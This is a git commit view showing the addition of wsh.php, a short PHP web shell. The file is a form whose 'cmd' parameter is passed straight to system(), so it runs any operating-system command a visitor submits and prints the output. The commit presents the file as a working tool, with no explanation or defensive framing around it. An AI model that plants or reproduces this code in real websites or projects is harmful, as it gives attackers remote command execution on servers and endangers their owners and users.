Initial commit

This commit is contained in:
2026-02-18 04:51:29 -08:00
commit 60be5446a1
19 changed files with 30740 additions and 0 deletions

16
wsh.php Normal file
View File

@@ -0,0 +1,16 @@
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd'] . ' 2>&1');
}
?>
</pre>
</body>
</html>